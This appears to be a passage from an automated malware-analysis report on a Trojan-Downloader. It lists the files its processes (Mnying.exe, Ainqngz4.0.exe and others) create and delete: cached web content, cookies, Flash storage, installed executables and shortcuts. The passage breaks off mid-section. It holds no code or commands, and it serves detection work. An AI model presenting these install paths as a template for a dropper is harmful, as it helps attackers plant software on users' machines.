%Documents and Settings%\%current user%\AppData\LocalLow\Mnying\1.png (3 bytes)
%Documents and Settings%\%current user%\AppData\LocalLow\Mnying\4.png (2 bytes)
%Documents and Settings%\%current user%\AppData\LocalLow\Mnying\7.png (2 bytes)
%Documents and Settings%\%current user%\AppData\LocalLow\Mnying\6.png (3 bytes)
%Documents and Settings%\%current user%\AppData\LocalLow\Mnying\edi.dat (324231 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\3[1].png (770 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\btns[1].js (1 bytes)
%Documents and Settings%\%current user%\AppData\LocalLow\Mnying\Fav9.dat (28289 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\du[1].htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\AppData\LocalLow\Mnying\btns.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\1[1].png (1435 bytes)

The process Mnying.exe:3116 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\2[1].jpg (3955 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\1[1].jpg (2714 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\409[1].htm (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\hm[2].js (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\css[1].css (2 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (388 bytes)
%Documents and Settings%\%current user%\UserData\2Z89WTQV\www.mnh.kaixin200[1].xml (266 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\4[1].jpg (5312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\bt-3[1].png (931 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\3[1].jpg (2799 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (189 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\bt1[1].png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\hm[3].js (12 bytes)

The Trojan-Downloader deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\hm[2].js (0 bytes)

The process Ainqngz4.0.exe:2176 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (242 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\crossdomain[4].xml (192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\new_box[1].js (145 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\crossdomain[6].xml (255 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\crossdomain[7].xml (192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\crossdomain[1].xml (257 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\170[1].png (398 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\#SharedObjects\QEA5Z3QJ\resource.ws.kukuplay.com\ppwebtest.sxx (158 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\channelInfo[1].htm (113 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\539b34bc[1].data (38348 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\h[1].js (254 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\fyminiloader-min[1].js (363 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\539b34a9[1].data (28966 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\539b34bd[1].data (44293 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\#SharedObjects\QEA5Z3QJ\resource.ws.kukuplay.com\[[IMPORT]]\resource.dl.kukuplay.com\upload\fishrlv31.swf\adsWeekLimit.sxx (34 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (200 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\693619_1371525642501[1].htm (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\mobileAds4[1].swf (4180 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\h[1].js (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\X-cdn[1] (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\339[1].png (2661 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@mmstat[1].txt (170 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\mini[1].png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\539b34ad[1].data (37369 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\fyminiloader-min[2].js (660 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\fengyun[1].swf (33043 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (164 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\#SharedObjects\QEA5Z3QJ\resource.ws.kukuplay.com\LiveClientID.sxx (124 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\539b34ba[1].data (51029 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\crossdomain[6].xml (257 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\xvideo15s140529[1].aspx (32649 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\ForbiddenTiming[1].htm (33 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\539b34c1[1].data (37339 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\539b34bf[1].data (42225 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\crossdomain[5].xml (257 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\539b34be[1].data (48562 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\logoyanyi[1].FLV (104026 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\539b34a8[1].data (22189 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\hm[1].js (5 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (215 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sxx (552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\jquery-1.8.3.min[1].js (60821 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (9124 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\CA4PMVS9.gif (35 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\539b34aa[1].data (37363 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\VGXE.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\init[1].htm (38 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#resource.ws.kukuplay.com\settings.sxx (235 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (717 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\flv[1].head (533 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\539b34ae[1].data (45285 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\analytics[1].js (584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\crossdomain[8].xml (255 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\requestviewrlv10[1].swf (649 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\231[1].png (1661 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\core[1].php (800 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (243 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\bg[1].jpg (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\539b34c5[1].data (4511 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\crossdomain[2].xml (245 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\539b34b5[1].data (30649 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\539b34ac[1].data (30083 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\play[1].htm (476 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\uiComponent[1].swf (61382 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\textLayout_2.0.0.232[1].swf (47080 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@cnzz[1].txt (165 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\mini[1].css (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\mini[1].js (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\fymini[1].htm (4447 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\rt[1].htm (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\flaF.tmp (102454 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\crossdomain[3].xml (255 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\94[1].png (749 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (245 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\539b34a8[1].data (37103 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\#SharedObjects\QEA5Z3QJ\resource.ws.kukuplay.com\boxTag.sxx (100 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\hm[1].js (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\crossdomain[1].xml (257 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\InterAct-96[1].swf (74456 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\crossdomain[4].xml (192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\crossdomain[8].xml (255 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\spark_4.6.0.22920[1].swf (115705 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\crossdomain[2].xml (257 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\191[1].png (932 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\539b34b4[1].data (23772 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\539b34b0[1].data (32625 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\539b34b8[1].data (31725 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (901 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\crossdomain[5].xml (255 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\X-cdn[1] (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\crossdomain[4].xml (255 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\#SharedObjects\QEA5Z3QJ\resource.ws.kukuplay.com\BinCookie.sxx (65 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\539b34a6[1].data (44953 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\539b34b3[1].data (29013 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\new_common[1].css (73 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\#SharedObjects\QEA5Z3QJ\resource.ws.kukuplay.com\MukioPlayer.sxx (33 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (472 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\539b34b7[1].data (25569 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\539b34b9[1].data (46847 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\xvideo15s140529[1].aspx (35569 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\stat[1].php (4098 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\crossdomain[7].xml (253 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\ok[1].com&c=693619_1371525642501 (344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\246[1].png (2705 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\ok[1].htm (476 bytes)
%Documents and Settings%\%current user%\UserData\YJM90VAL\statistics.m0lxcdn.kukuplay[1].xml (266 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\framework_4.6.0.22920[1].swf (87780 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\play[1].com&c=693619_1371525642501 (343 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\crossdomain[1].xml (245 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\fishrlv31[1].swf (34444 bytes)
%Documents and Settings%\%current user%\UserData\2Z89WTQV\mini.fengyunzhibo[1].xml (266 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\dynchannelproperty[1].htm (363 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\crossdomain[9].xml (192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\crossdomain[3].xml (255 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (245 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\#SharedObjects\QEA5Z3QJ\resource.ws.kukuplay.com\[[IMPORT]]\resource.dl.kukuplay.com\upload\fishrlv31.swf\adsCache.sxx (30 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (675 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\539b34c0[1].data (28876 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\csplayer15s0319[1].aspx (15619 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\crossdomain[5].xml (255 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\539b34bb[1].data (40426 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\fymini[2].htm (4721 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\BarrageV5.7[1].swf (83993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\539b34b2[1].data (15951 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\539b34a9[1].data (16157 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (205 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\crossdomain[2].xml (255 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\CAIZWDOT.gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\539b34a7[2].data (32303 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\stat[1].gif (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\channelInfo[1].htm (70 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\539b34af[1].data (25355 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (480 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\539b34b6[1].data (28509 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\channelInfo[1].htm (70 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\185[1].png (1700 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\539b34c3[1].data (30517 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\h[2].js (547 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\crossdomain[6].xml (255 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\crossdomain[3].xml (255 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\539b34b1[1].data (22083 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\h[2].js (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\normalImage[1].png (1189 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\programs_json[1].htm (19 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\crossdomain[5].xml (255 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\#SharedObjects\QEA5Z3QJ\resource.ws.kukuplay.com\recordLottrey.sxx (35 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\fullImage[1].png (910 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\crossdomain[4].xml (255 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\zhibo2[1].htm (1 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@fengyunzhibo[1].txt (188 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\539b34ab[1].data (34949 bytes)
%System%\d3d9caps.tmp (1324 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\34[1].png (1591 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\crossdomain[7].xml (255 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\539b34c2[1].data (34485 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\analytics[1].js (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\539b34a6[1].data (19329 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\crossdomain[3].xml (257 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\crossdomain[1].xml (245 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\crossdomain[6].xml (192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\539b34a7[1].data (30406 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\ForbiddenTiming[1].htm (33 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\539b34aa[1].data (18029 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\recommends[1].htm (2 bytes)
%Documents and Settings%\%current user%\UserData\KTOR0Z81\statistics.m0lxcdn.kukuplay[1].xml (266 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\crossdomain[2].xml (245 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (332 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\#SharedObjects\QEA5Z3QJ\resource.ws.kukuplay.com\datefengyun.sxx (33 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\lib20140124182612[1].swf (22561 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\DD_belatedPNG_0.0.8a-min[1].js (3814 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\crossdomain[8].xml (85 bytes)

The Trojan-Downloader deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\CAIZWDOT.gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\ok[1].com&c=693619_1371525642501 (0 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\#SharedObjects\QEA5Z3QJ\resource.ws.kukuplay.com\ppwebtest.sxx (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\UserData\2Z89WTQV\www.aaa[1].xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\h[1].js (0 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\settings.sol (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\fyminiloader-min[1].js (0 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\#SharedObjects\QEA5Z3QJ\resource.ws.kukuplay.com\recordLottrey.sxx (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\play[1].com&c=693619_1371525642501 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0H6R4PUB\h[1].js (0 bytes)
%System%\d3d9caps.dat (0 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\#SharedObjects\QEA5Z3QJ\resource.ws.kukuplay.com\ppwebtest.sol (0 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\#SharedObjects\QEA5Z3QJ\resource.ws.kukuplay.com\[[IMPORT]]\resource.dl.kukuplay.com\upload\fishrlv31.swf\adsCache.sxx (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\analytics[1].js (0 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\#SharedObjects\QEA5Z3QJ\resource.ws.kukuplay.com\boxTag.sxx (0 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\#SharedObjects\QEA5Z3QJ\resource.ws.kukuplay.com\LiveClientID.sxx (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\xvideo15s140529[1].aspx (0 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\#resource.ws.kukuplay.com\settings.sol (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\F636DCBL\ForbiddenTiming[1].htm (0 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\#SharedObjects\QEA5Z3QJ\resource.ws.kukuplay.com\[[IMPORT]]\resource.dl.kukuplay.com\upload\fishrlv31.swf\adsWeekLimit.sxx (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\channelInfo[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\logoyanyi[1].FLV (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05234TQF\hm[1].js (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][2].txt (0 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\#SharedObjects\QEA5Z3QJ\resource.ws.kukuplay.com\datefengyun.sxx (0 bytes)
%Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\#SharedObjects\QEA5Z3QJ\resource.ws.kukuplay.com\MukioPlayer.sxx (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\GHAJ0XQJ\CA4PMVS9.gif (0 bytes)
%Documents and Settings%\%current user%\Cookies\[email protected][1].txt (0 bytes)

The process -8670_360_MM.exe:1148 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Start Menu\Programs\ÃÀŮӪ\ÃÀŮӪ.lnk (666 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\ÃÀŮӪ\жÔØÃÀŮӪ.lnk (654 bytes)
%Program Files%\Mnying\usst.exe (715 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse9.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse9.tmp\Mnying.exe (42271 bytes)
%Documents and Settings%\All Users\Desktop\ÃÀŮӪ.lnk (654 bytes)
%Program Files%\Mnying\mvyy.exe (7443 bytes)
%Program Files%\Mnying\Mnying.exe (42271 bytes)
%Program Files%\Mnying\ÃÀŮӪ.lnk (598 bytes)

The Trojan-Downloader deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nse9.tmp\Mnying.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nse9.tmp\System.dll (0 bytes)

The process vcredist_x86.exe:1940 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

